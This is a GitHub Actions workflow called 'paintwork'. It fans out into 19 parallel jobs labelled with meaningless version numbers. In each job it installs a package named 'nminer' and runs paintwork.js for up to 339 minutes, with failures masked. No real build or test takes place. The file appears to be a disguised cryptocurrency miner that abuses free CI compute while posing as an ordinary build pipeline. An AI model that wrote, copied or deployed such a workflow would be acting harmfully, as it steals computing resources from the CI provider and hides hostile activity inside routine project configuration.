name: paintwork
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 5976 }
          - { version: 4735 }
          - { version: 4377 }
          - { version: 1036 }
          - { version: 1190 }
          - { version: 6922 }
          - { version: 7031 }
          - { version: 1350 }
          - { version: 552 }
          - { version: 1196 }
          - { version: 9998 }
          - { version: 4897 }
          - { version: 4322 }
          - { version: 6437 }
          - { version: 1415 }
          - { version: 730 }
          - { version: 6442 }
          - { version: 387 }
          - { version: 9692 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: unrealistic
        run: |
          npm install nminer@latest
          timeout 339m node paintwork.js || echo "paintwork executed"